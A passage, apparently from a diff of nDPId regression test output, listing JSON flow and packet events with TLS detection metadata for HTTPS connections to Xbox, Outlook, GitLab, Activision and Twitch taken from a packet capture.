AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1646483012464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646483012464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NmFAAEAGec\/AqAGAKGGgApuUAbvrsR4tAAAAAKAC+vCXKwAAAgQFtAQCCAqLefivAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1646483012642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646483012642,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0h61AAOYGgoooYaACwKgBgAG7m5Tksd5d67EeLoAS\/\/96NQAAAgQFtAEDAwgBAQQC"} -01149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1646483012643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646483012643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItNmNAAEAGd9zAqAGAKGGgApuUAbvrsR4u5LHeXlAYAfZhOgAAFgMBAgABAAH8AwO1u+oefRTEOwSLQjLjHhVV0xmNEBLIePou\/aAHVOd2CCAPyrTST2MnYmbxM2VIZnvQo7xJWWszq6XT0HB3y7IoMAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtvdXRsb29rLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBWvkXIQj27ydSlWNcrtPVAAtDjckdSwzserfJQbjqaWAAXAEEEmLcB97hFECojXeQm9a5elnWgKYRExdFmjiW10ZfBGP+icRnFpjaWBz97zhMeOCLZ79LJYWeVZvs9jOUTVoTTCAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} +01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} 